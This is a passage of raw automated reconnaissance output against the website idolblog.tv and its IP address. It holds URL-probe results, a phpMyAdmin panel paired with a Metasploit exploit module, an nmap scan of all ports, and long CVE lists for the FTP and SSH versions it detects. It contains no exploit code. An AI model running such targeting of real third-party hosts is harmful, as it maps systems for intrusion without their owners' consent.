9991 _[ - ]::--------------------------------------------------------------------------------------------------------------
9992|_[ + ] [ 62 / 100 ]-[03:57:45] [ - ]
9993|_[ + ] Target:: [ http://idolblog.tv/page/75/ ]
9994|_[ + ] Exploit::
9995|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
9996|_[ + ] More details:: / - / , ISP:
9997|_[ + ] Found:: UNIDENTIFIED
9998
9999 _[ - ]::--------------------------------------------------------------------------------------------------------------
10000|_[ + ] [ 63 / 100 ]-[03:57:49] [ - ]
10001|_[ + ] Target:: [ http://idolblog.tv/page/93/ ]
10002|_[ + ] Exploit::
10003|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10004|_[ + ] More details:: / - / , ISP:
10005|_[ + ] Found:: UNIDENTIFIED
10006
10007 _[ - ]::--------------------------------------------------------------------------------------------------------------
10008|_[ + ] [ 64 / 100 ]-[03:57:52] [ - ]
10009|_[ + ] Target:: [ http://idolblog.tv/page/8/ ]
10010|_[ + ] Exploit::
10011|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10012|_[ + ] More details:: / - / , ISP:
10013|_[ + ] Found:: UNIDENTIFIED
10014
10015 _[ - ]::--------------------------------------------------------------------------------------------------------------
10016|_[ + ] [ 65 / 100 ]-[03:57:57] [ - ]
10017|_[ + ] Target:: [ http://idolblog.tv/page/127/ ]
10018|_[ + ] Exploit::
10019|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10020|_[ + ] More details:: / - / , ISP:
10021|_[ + ] Found:: UNIDENTIFIED
10022
10023 _[ - ]::--------------------------------------------------------------------------------------------------------------
10024|_[ + ] [ 66 / 100 ]-[03:58:01] [ - ]
10025|_[ + ] Target:: [ http://idolblog.tv/page/6/ ]
10026|_[ + ] Exploit::
10027|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10028|_[ + ] More details:: / - / , ISP:
10029|_[ + ] Found:: UNIDENTIFIED
10030
10031 _[ - ]::--------------------------------------------------------------------------------------------------------------
10032|_[ + ] [ 67 / 100 ]-[03:58:04] [ - ]
10033|_[ + ] Target:: [ http://idolblog.tv/page/44/ ]
10034|_[ + ] Exploit::
10035|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10036|_[ + ] More details:: / - / , ISP:
10037|_[ + ] Found:: UNIDENTIFIED
10038
10039 _[ - ]::--------------------------------------------------------------------------------------------------------------
10040|_[ + ] [ 68 / 100 ]-[03:58:08] [ - ]
10041|_[ + ] Target:: [ http://idolblog.tv/page/3/ ]
10042|_[ + ] Exploit::
10043|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10044|_[ + ] More details:: / - / , ISP:
10045|_[ + ] Found:: UNIDENTIFIED
10046
10047 _[ - ]::--------------------------------------------------------------------------------------------------------------
10048|_[ + ] [ 69 / 100 ]-[03:58:12] [ - ]
10049|_[ + ] Target:: [ http://idolblog.tv/page/110/ ]
10050|_[ + ] Exploit::
10051|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10052|_[ + ] More details:: / - / , ISP:
10053|_[ + ] Found:: UNIDENTIFIED
10054
10055 _[ - ]::--------------------------------------------------------------------------------------------------------------
10056|_[ + ] [ 70 / 100 ]-[03:58:17] [ - ]
10057|_[ + ] Target:: [ http://idolblog.tv/page/62/ ]
10058|_[ + ] Exploit::
10059|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10060|_[ + ] More details:: / - / , ISP:
10061|_[ + ] Found:: UNIDENTIFIED
10062
10063 _[ - ]::--------------------------------------------------------------------------------------------------------------
10064|_[ + ] [ 71 / 100 ]-[03:58:22] [ - ]
10065|_[ + ] Target:: [ http://idolblog.tv/page/56/ ]
10066|_[ + ] Exploit::
10067|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10068|_[ + ] More details:: / - / , ISP:
10069|_[ + ] Found:: UNIDENTIFIED
10070
10071 _[ - ]::--------------------------------------------------------------------------------------------------------------
10072|_[ + ] [ 72 / 100 ]-[03:58:26] [ - ]
10073|_[ + ] Target:: [ http://idolblog.tv/32979-2/ ]
10074|_[ + ] Exploit::
10075|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10076|_[ + ] More details:: / - / , ISP:
10077|_[ + ] Found:: UNIDENTIFIED
10078
10079 _[ - ]::--------------------------------------------------------------------------------------------------------------
10080|_[ + ] [ 73 / 100 ]-[03:58:31] [ - ]
10081|_[ + ] Target:: [ http://idolblog.tv/page/101/ ]
10082|_[ + ] Exploit::
10083|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10084|_[ + ] More details:: / - / , ISP:
10085|_[ + ] Found:: UNIDENTIFIED
10086
10087 _[ - ]::--------------------------------------------------------------------------------------------------------------
10088|_[ + ] [ 74 / 100 ]-[03:58:36] [ - ]
10089|_[ + ] Target:: [ http://idolblog.tv/category/dvds/ ]
10090|_[ + ] Exploit::
10091|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10092|_[ + ] More details:: / - / , ISP:
10093|_[ + ] Found:: UNIDENTIFIED
10094
10095 _[ - ]::--------------------------------------------------------------------------------------------------------------
10096|_[ + ] [ 75 / 100 ]-[03:58:41] [ - ]
10097|_[ + ] Target:: [ http://idolblog.tv/page/18/ ]
10098|_[ + ] Exploit::
10099|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10100|_[ + ] More details:: / - / , ISP:
10101|_[ + ] Found:: UNIDENTIFIED
10102
10103 _[ - ]::--------------------------------------------------------------------------------------------------------------
10104|_[ + ] [ 76 / 100 ]-[03:58:45] [ - ]
10105|_[ + ] Target:: [ http://idolblog.tv/page/108/ ]
10106|_[ + ] Exploit::
10107|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10108|_[ + ] More details:: / - / , ISP:
10109|_[ + ] Found:: UNIDENTIFIED
10110
10111 _[ - ]::--------------------------------------------------------------------------------------------------------------
10112|_[ + ] [ 77 / 100 ]-[03:58:50] [ - ]
10113|_[ + ] Target:: [ http://idolblog.tv/page/57/ ]
10114|_[ + ] Exploit::
10115|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10116|_[ + ] More details:: / - / , ISP:
10117|_[ + ] Found:: UNIDENTIFIED
10118
10119 _[ - ]::--------------------------------------------------------------------------------------------------------------
10120|_[ + ] [ 78 / 100 ]-[03:58:54] [ - ]
10121|_[ + ] Target:: [ http://idolblog.tv/page/152/ ]
10122|_[ + ] Exploit::
10123|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10124|_[ + ] More details:: / - / , ISP:
10125|_[ + ] Found:: UNIDENTIFIED
10126
10127 _[ - ]::--------------------------------------------------------------------------------------------------------------
10128|_[ + ] [ 79 / 100 ]-[03:58:59] [ - ]
10129|_[ + ] Target:: [ http://idolblog.tv/page/143/ ]
10130|_[ + ] Exploit::
10131|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10132|_[ + ] More details:: / - / , ISP:
10133|_[ + ] Found:: UNIDENTIFIED
10134
10135 _[ - ]::--------------------------------------------------------------------------------------------------------------
10136|_[ + ] [ 80 / 100 ]-[03:59:04] [ - ]
10137|_[ + ] Target:: [ http://idolblog.tv/page/49/ ]
10138|_[ + ] Exploit::
10139|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10140|_[ + ] More details:: / - / , ISP:
10141|_[ + ] Found:: UNIDENTIFIED
10142
10143 _[ - ]::--------------------------------------------------------------------------------------------------------------
10144|_[ + ] [ 81 / 100 ]-[03:59:08] [ - ]
10145|_[ + ] Target:: [ http://idolblog.tv/page/68/ ]
10146|_[ + ] Exploit::
10147|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10148|_[ + ] More details:: / - / , ISP:
10149|_[ + ] Found:: UNIDENTIFIED
10150
10151 _[ - ]::--------------------------------------------------------------------------------------------------------------
10152|_[ + ] [ 82 / 100 ]-[03:59:12] [ - ]
10153|_[ + ] Target:: [ http://idolblog.tv/tag/erika/ ]
10154|_[ + ] Exploit::
10155|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10156|_[ + ] More details:: / - / , ISP:
10157|_[ + ] Found:: UNIDENTIFIED
10158
10159 _[ - ]::--------------------------------------------------------------------------------------------------------------
10160|_[ + ] [ 83 / 100 ]-[03:59:17] [ - ]
10161|_[ + ] Target:: [ http://idolblog.tv/page/109/ ]
10162|_[ + ] Exploit::
10163|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10164|_[ + ] More details:: / - / , ISP:
10165|_[ + ] Found:: UNIDENTIFIED
10166
10167 _[ - ]::--------------------------------------------------------------------------------------------------------------
10168|_[ + ] [ 84 / 100 ]-[03:59:21] [ - ]
10169|_[ + ] Target:: [ http://idolblog.tv/category/photobooks/ ]
10170|_[ + ] Exploit::
10171|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10172|_[ + ] More details:: / - / , ISP:
10173|_[ + ] Found:: UNIDENTIFIED
10174
10175 _[ - ]::--------------------------------------------------------------------------------------------------------------
10176|_[ + ] [ 85 / 100 ]-[03:59:25] [ - ]
10177|_[ + ] Target:: [ http://idolblog.tv/page/115/ ]
10178|_[ + ] Exploit::
10179|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10180|_[ + ] More details:: / - / , ISP:
10181|_[ + ] Found:: UNIDENTIFIED
10182
10183 _[ - ]::--------------------------------------------------------------------------------------------------------------
10184|_[ + ] [ 86 / 100 ]-[03:59:29] [ - ]
10185|_[ + ] Target:: [ http://idolblog.tv/page/26/ ]
10186|_[ + ] Exploit::
10187|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10188|_[ + ] More details:: / - / , ISP:
10189|_[ + ] Found:: UNIDENTIFIED
10190
10191 _[ - ]::--------------------------------------------------------------------------------------------------------------
10192|_[ + ] [ 87 / 100 ]-[03:59:33] [ - ]
10193|_[ + ] Target:: [ http://idolblog.tv/page/32/ ]
10194|_[ + ] Exploit::
10195|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10196|_[ + ] More details:: / - / , ISP:
10197|_[ + ] Found:: UNIDENTIFIED
10198
10199 _[ - ]::--------------------------------------------------------------------------------------------------------------
10200|_[ + ] [ 88 / 100 ]-[03:59:37] [ - ]
10201|_[ + ] Target:: [ http://idolblog.tv/page/27/ ]
10202|_[ + ] Exploit::
10203|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10204|_[ + ] More details:: / - / , ISP:
10205|_[ + ] Found:: UNIDENTIFIED
10206
10207 _[ - ]::--------------------------------------------------------------------------------------------------------------
10208|_[ + ] [ 89 / 100 ]-[03:59:41] [ - ]
10209|_[ + ] Target:: [ http://idolblog.tv/page/52/ ]
10210|_[ + ] Exploit::
10211|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10212|_[ + ] More details:: / - / , ISP:
10213|_[ + ] Found:: UNIDENTIFIED
10214
10215 _[ - ]::--------------------------------------------------------------------------------------------------------------
10216|_[ + ] [ 90 / 100 ]-[03:59:46] [ - ]
10217|_[ + ] Target:: [ http://idolblog.tv/page/85/ ]
10218|_[ + ] Exploit::
10219|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10220|_[ + ] More details:: / - / , ISP:
10221|_[ + ] Found:: UNIDENTIFIED
10222
10223 _[ - ]::--------------------------------------------------------------------------------------------------------------
10224|_[ + ] [ 91 / 100 ]-[03:59:50] [ - ]
10225|_[ + ] Target:: [ http://idolblog.tv/page/10/ ]
10226|_[ + ] Exploit::
10227|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10228|_[ + ] More details:: / - / , ISP:
10229|_[ + ] Found:: UNIDENTIFIED
10230
10231 _[ - ]::--------------------------------------------------------------------------------------------------------------
10232|_[ + ] [ 92 / 100 ]-[03:59:55] [ - ]
10233|_[ + ] Target:: [ http://idolblog.tv/author/idolblog/ ]
10234|_[ + ] Exploit::
10235|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10236|_[ + ] More details:: / - / , ISP:
10237|_[ + ] Found:: UNIDENTIFIED
10238
10239 _[ - ]::--------------------------------------------------------------------------------------------------------------
10240|_[ + ] [ 93 / 100 ]-[03:59:59] [ - ]
10241|_[ + ] Target:: [ http://idolblog.tv/page/157/ ]
10242|_[ + ] Exploit::
10243|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10244|_[ + ] More details:: / - / , ISP:
10245|_[ + ] Found:: UNIDENTIFIED
10246
10247 _[ - ]::--------------------------------------------------------------------------------------------------------------
10248|_[ + ] [ 94 / 100 ]-[04:00:04] [ - ]
10249|_[ + ] Target:: [ http://idolblog.tv/page/103/ ]
10250|_[ + ] Exploit::
10251|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10252|_[ + ] More details:: / - / , ISP:
10253|_[ + ] Found:: UNIDENTIFIED
10254
10255 _[ - ]::--------------------------------------------------------------------------------------------------------------
10256|_[ + ] [ 95 / 100 ]-[04:00:08] [ - ]
10257|_[ + ] Target:: [ http://idolblog.tv/page/63/ ]
10258|_[ + ] Exploit::
10259|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10260|_[ + ] More details:: / - / , ISP:
10261|_[ + ] Found:: UNIDENTIFIED
10262
10263 _[ - ]::--------------------------------------------------------------------------------------------------------------
10264|_[ + ] [ 96 / 100 ]-[04:00:13] [ - ]
10265|_[ + ] Target:: [ http://idolblog.tv/category/other/ ]
10266|_[ + ] Exploit::
10267|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10268|_[ + ] More details:: / - / , ISP:
10269|_[ + ] Found:: UNIDENTIFIED
10270
10271 _[ - ]::--------------------------------------------------------------------------------------------------------------
10272|_[ + ] [ 97 / 100 ]-[04:00:17] [ - ]
10273|_[ + ] Target:: [ http://idolblog.tv/page/129/ ]
10274|_[ + ] Exploit::
10275|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10276|_[ + ] More details:: / - / , ISP:
10277|_[ + ] Found:: UNIDENTIFIED
10278
10279 _[ - ]::--------------------------------------------------------------------------------------------------------------
10280|_[ + ] [ 98 / 100 ]-[04:00:21] [ - ]
10281|_[ + ] Target:: [ http://idolblog.tv/page/9/ ]
10282|_[ + ] Exploit::
10283|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10284|_[ + ] More details:: / - / , ISP:
10285|_[ + ] Found:: UNIDENTIFIED
10286
10287 _[ - ]::--------------------------------------------------------------------------------------------------------------
10288|_[ + ] [ 99 / 100 ]-[04:00:26] [ - ]
10289|_[ + ] Target:: [ http://idolblog.tv/page/133/ ]
10290|_[ + ] Exploit::
10291|_[ + ] Information Server:: HTTP/1.1 200 OK, Server: Apache/2 X-Powered-By: PHP/5.6.35, IP:89.248.174.131:80
10292|_[ + ] More details:: / - / , ISP:
10293|_[ + ] Found:: UNIDENTIFIED
10294
10295[ INFO ] [ Shutting down ]
10296[ INFO ] [ End of process INURLBR at [20-07-2019 04:00:26]
10297[ INFO ] [ TOTAL FILTERED VALUES ]:: [ 0 ]
10298[ INFO ] [ OUTPUT FILE ]:: [ /usr/share/sniper/loot/workspace/idolblog.tv/output/inurlbr-idolblog.tv ]
10299|_________________________________________________________________________________________
10300
10301\_________________________________________________________________________________________/
10302#####################################################################################################################################
10303+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
10304| App Name | URL to Application | Potential Exploit | Username | Password |
10305+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
10306| phpMyAdmin | https://89.248.174.131:443/phpmyadmin/ | ./exploits/multi/http/phpmyadmin_preg_replace.rb | Not Found | Not Found |
10307+------------+----------------------------------------+--------------------------------------------------+-----------+-----------+
10308#######################################################################################################################################
10309Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-20 04:04 EDT
10310NSE: Loaded 45 scripts for scanning.
10311NSE: Script Pre-scanning.
10312NSE: Starting runlevel 1 (of 2) scan.
10313Initiating NSE at 04:04
10314Completed NSE at 04:04, 0.00s elapsed
10315NSE: Starting runlevel 2 (of 2) scan.
10316Initiating NSE at 04:04
10317Completed NSE at 04:04, 0.00s elapsed
10318Initiating Ping Scan at 04:04
10319Scanning idolblog.tv (89.248.174.131) [4 ports]
10320Completed Ping Scan at 04:04, 0.27s elapsed (1 total hosts)
10321Initiating Parallel DNS resolution of 1 host. at 04:04
10322Completed Parallel DNS resolution of 1 host. at 04:04, 0.03s elapsed
10323Initiating Connect Scan at 04:04
10324Scanning idolblog.tv (89.248.174.131) [65535 ports]
10325Discovered open port 21/tcp on 89.248.174.131
10326Discovered open port 3306/tcp on 89.248.174.131
10327Discovered open port 22/tcp on 89.248.174.131
10328Discovered open port 993/tcp on 89.248.174.131
10329Discovered open port 443/tcp on 89.248.174.131
10330Discovered open port 587/tcp on 89.248.174.131
10331Discovered open port 80/tcp on 89.248.174.131
10332Discovered open port 53/tcp on 89.248.174.131
10333Discovered open port 995/tcp on 89.248.174.131
10334Discovered open port 110/tcp on 89.248.174.131
10335Discovered open port 143/tcp on 89.248.174.131
10336Discovered open port 111/tcp on 89.248.174.131
10337Connect Scan Timing: About 5.80% done; ETC: 04:13 (0:08:23 remaining)
10338Discovered open port 2222/tcp on 89.248.174.131
10339Connect Scan Timing: About 11.57% done; ETC: 04:13 (0:07:46 remaining)
10340Discovered open port 465/tcp on 89.248.174.131
10341Connect Scan Timing: About 22.48% done; ETC: 04:11 (0:05:14 remaining)
10342Connect Scan Timing: About 19.87% done; ETC: 04:14 (0:08:08 remaining)
10343Connect Scan Timing: About 24.91% done; ETC: 04:14 (0:07:35 remaining)
10344Connect Scan Timing: About 33.01% done; ETC: 04:13 (0:06:07 remaining)
10345Connect Scan Timing: About 40.59% done; ETC: 04:13 (0:05:09 remaining)
10346Connect Scan Timing: About 48.43% done; ETC: 04:12 (0:04:17 remaining)
10347Connect Scan Timing: About 56.80% done; ETC: 04:12 (0:03:26 remaining)
10348Connect Scan Timing: About 63.47% done; ETC: 04:12 (0:02:53 remaining)
10349Connect Scan Timing: About 72.99% done; ETC: 04:11 (0:02:03 remaining)
10350Connect Scan Timing: About 84.64% done; ETC: 04:11 (0:01:06 remaining)
10351Completed Connect Scan at 04:11, 404.40s elapsed (65535 total ports)
10352Initiating Service scan at 04:11
10353Scanning 14 services on idolblog.tv (89.248.174.131)
10354Completed Service scan at 04:11, 17.16s elapsed (14 services on 1 host)
10355Initiating OS detection (try #1) against idolblog.tv (89.248.174.131)
10356Retrying OS detection (try #2) against idolblog.tv (89.248.174.131)
10357Initiating Traceroute at 04:11
10358Completed Traceroute at 04:11, 3.02s elapsed
10359Initiating Parallel DNS resolution of 9 hosts. at 04:11
10360Completed Parallel DNS resolution of 9 hosts. at 04:11, 0.31s elapsed
10361NSE: Script scanning 89.248.174.131.
10362NSE: Starting runlevel 1 (of 2) scan.
10363Initiating NSE at 04:11
10364NSE Timing: About 96.92% done; ETC: 04:12 (0:00:01 remaining)
10365Completed NSE at 04:12, 42.33s elapsed
10366NSE: Starting runlevel 2 (of 2) scan.
10367Initiating NSE at 04:12
10368Completed NSE at 04:12, 0.50s elapsed
10369Nmap scan report for idolblog.tv (89.248.174.131)
10370Host is up, received reset ttl 56 (0.24s latency).
10371Scanned at 2019-07-20 04:04:20 EDT for 473s
10372Not shown: 55625 filtered ports, 9896 closed ports
10373Reason: 55625 no-responses and 9896 conn-refused
10374PORT STATE SERVICE REASON VERSION
1037521/tcp open ftp syn-ack Pure-FTPd
10376| vulscan: VulDB - https://vuldb.com:
10377| [102925] Foscam C1 Indoor HD Camera 2.52.2.37 Web Management Interface pureftpd.passwd HTTP Request privilege escalation
10378| [57510] Pureftpd Pure-FTPd up to 0.x Memory Consumption denial of service
10379| [57504] Pureftpd Pure-FTPd up to 0.x ftp_parser.c Cleartext unknown vulnerability
10380|
10381| MITRE CVE - https://cve.mitre.org:
10382| [CVE-2004-0656] The accept_client function in PureFTPd 1.0.18 and earlier allows remote attackers to cause a denial of service by exceeding the maximum number of connections.
10383|
10384| SecurityFocus - https://www.securityfocus.com/bid/:
10385| [10664] PureFTPd Accept_Client Remote Denial of Service Vulnerability
10386|
10387| IBM X-Force - https://exchange.xforce.ibmcloud.com:
10388| No findings
10389|
10390| Exploit-DB - https://www.exploit-db.com:
10391| No findings
10392|
10393| OpenVAS (Nessus) - http://www.openvas.org:
10394| No findings
10395|
10396| SecurityTracker - https://www.securitytracker.com:
10397| [1010701] PureFTPd Logic Bug in accept_client() Lets Remote Users Crash the FTP Daemon
10398| [1008135] (Claim is Retracted) PureFTPd Buffer Overflow in displayrate() Lets Remote Users Crash the Service
10399| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
10400| [1001126] PureFTPd May Allow Remote Users to Deny Service on the Server
10401|
10402| OSVDB - http://www.osvdb.org:
10403| No findings
10404|_
1040522/tcp open ssh syn-ack OpenSSH 7.4 (protocol 2.0)
10406| vulners:
10407| cpe:/a:openbsd:openssh:7.4:
10408| CVE-2018-15919 5.0 https://vulners.com/cve/CVE-2018-15919
10409|_ CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
10410| vulscan: VulDB - https://vuldb.com:
10411| [130671] gsi-openssh-server 7.9p1 on Fedora /etc/gsissh/sshd_config weak authentication
10412| [130371] OpenSSH 7.9 scp Man-in-the-Middle directory traversal
10413| [130370] OpenSSH 7.9 Man-in-the-Middle spoofing
10414| [130369] OpenSSH 7.9 Encoding progressmeter.c refresh_progress_meter() spoofing
10415| [129007] OpenSSH 7.9 scp Client scp.c Filename privilege escalation
10416| [123343] OpenSSH up to 7.8 GSS2 auth-gss2.c information disclosure
10417| [123011] OpenSSH up to 7.7 auth2-gss.c Request information disclosure
10418| [112267] OpenSSH up to 7.3 sshd kex.c/packet.c NEWKEYS Message denial of service
10419| [108627] OpenSSH up to 7.5 Readonly Mode sftp-server.c process_open unknown vulnerability
10420| [94611] OpenSSH up to 7.3 Access Control privilege escalation
10421| [94610] OpenSSH up to 7.3 Shared Memory Manager privilege escalation
10422| [94608] OpenSSH up to 7.3 Unix-Domain Socket privilege escalation
10423| [94607] OpenSSH up to 7.3 Forwarded Agent Channel privilege escalation
10424| [90671] OpenSSH up to 7.2 auth-passwd.c auth_password denial of service
10425| [90405] OpenSSH up to 7.2p2 sshd information disclosure
10426| [90404] OpenSSH up to 7.2p2 sshd information disclosure
10427| [90403] OpenSSH up to 7.2p2 sshd CPU Exhaustion denial of service
10428| [89622] OpenSSH 7.2p2 Authentication Username information disclosure
10429| [81320] OpenSSH up to 7.2p1 X11 Authentication Credential xauth privilege escalation
10430| [80656] OpenBSD OpenSSH 7.1 X11 Forwarding privilege escalation
10431| [80330] OpenSSH up to 7.1p1 packet.c ssh_packet_read_poll2 memory corruption
10432|
10433| MITRE CVE - https://cve.mitre.org:
10434| [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
10435| [CVE-1999-0661] A system is running a version of software that was replaced with a Trojan Horse at one of its distribution points, such as (1) TCP Wrappers 7.6, (2) util-linux 2.9g, (3) wuarchive ftpd (wuftpd) 2.2 and 2.1f, (4) IRC client (ircII) ircII 2.2.9, (5) OpenSSH 3.4p1, or (6) Sendmail 8.12.6.
10436|
10437| SecurityFocus - https://www.securityfocus.com/bid/:
10438| [102780] OpenSSH CVE-2016-10708 Multiple Denial of Service Vulnerabilities
10439| [101552] OpenSSH 'sftp-server.c' Remote Security Bypass Vulnerability
10440| [94977] OpenSSH CVE-2016-10011 Local Information Disclosure Vulnerability
10441| [94975] OpenSSH CVE-2016-10012 Security Bypass Vulnerability
10442| [94972] OpenSSH CVE-2016-10010 Privilege Escalation Vulnerability
10443| [94968] OpenSSH CVE-2016-10009 Remote Code Execution Vulnerability
10444| [93776] OpenSSH 'ssh/kex.c' Denial of Service Vulnerability
10445| [92212] OpenSSH CVE-2016-6515 Denial of Service Vulnerability
10446| [92210] OpenSSH CBC Padding Weak Encryption Security Weakness
10447| [92209] OpenSSH MAC Verification Security Bypass Vulnerability
10448| [91812] OpenSSH CVE-2016-6210 User Enumeration Vulnerability
10449| [90440] OpenSSH CVE-2004-1653 Remote Security Vulnerability
10450| [90340] OpenSSH CVE-2004-2760 Remote Security Vulnerability
10451| [89385] OpenSSH CVE-2005-2666 Local Security Vulnerability
10452| [88655] OpenSSH CVE-2001-1382 Remote Security Vulnerability
10453| [88513] OpenSSH CVE-2000-0999 Remote Security Vulnerability
10454| [88367] OpenSSH CVE-1999-1010 Local Security Vulnerability
10455| [87789] OpenSSH CVE-2003-0682 Remote Security Vulnerability
10456| [86187] OpenSSH 'session.c' Local Security Bypass Vulnerability
10457| [86144] OpenSSH CVE-2007-2768 Remote Security Vulnerability
10458| [84427] OpenSSH CVE-2016-1908 Security Bypass Vulnerability
10459| [84314] OpenSSH CVE-2016-3115 Remote Command Injection Vulnerability
10460| [84185] OpenSSH CVE-2006-4925 Denial-Of-Service Vulnerability
10461| [81293] OpenSSH CVE-2016-1907 Denial of Service Vulnerability
10462| [80698] OpenSSH CVE-2016-0778 Heap Based Buffer Overflow Vulnerability
10463| [80695] OpenSSH CVE-2016-0777 Information Disclosure Vulnerability
10464| [76497] OpenSSH CVE-2015-6565 Local Security Bypass Vulnerability
10465| [76317] OpenSSH PAM Support Multiple Remote Code Execution Vulnerabilities
10466| [75990] OpenSSH Login Handling Security Bypass Weakness
10467| [75525] OpenSSH 'x11_open_helper()' Function Security Bypass Vulnerability
10468| [71420] Portable OpenSSH 'gss-serv-krb5.c' Security Bypass Vulnerability
10469| [68757] OpenSSH Multiple Remote Denial of Service Vulnerabilities
10470| [66459] OpenSSH Certificate Validation Security Bypass Vulnerability
10471| [66355] OpenSSH 'child_set_env()' Function Security Bypass Vulnerability
10472| [65674] OpenSSH 'ssh-keysign.c' Local Information Disclosure Vulnerability
10473| [65230] OpenSSH 'schnorr.c' Remote Memory Corruption Vulnerability
10474| [63605] OpenSSH 'sshd' Process Remote Memory Corruption Vulnerability
10475| [61286] OpenSSH Remote Denial of Service Vulnerability
10476| [58894] GSI-OpenSSH PAM_USER Security Bypass Vulnerability
10477| [58162] OpenSSH CVE-2010-5107 Denial of Service Vulnerability
10478| [54114] OpenSSH 'ssh_gssapi_parse_ename()' Function Denial of Service Vulnerability
10479| [51702] Debian openssh-server Forced Command Handling Information Disclosure Vulnerability
10480| [50416] Linux Kernel 'kdump' and 'mkdumprd' OpenSSH Integration Remote Information Disclosure Vulnerability
10481| [49473] OpenSSH Ciphersuite Specification Information Disclosure Weakness
10482| [48507] OpenSSH 'pam_thread()' Remote Buffer Overflow Vulnerability
10483| [47691] Portable OpenSSH 'ssh-keysign' Local Unauthorized Access Vulnerability
10484| [46155] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
10485| [45304] OpenSSH J-PAKE Security Bypass Vulnerability
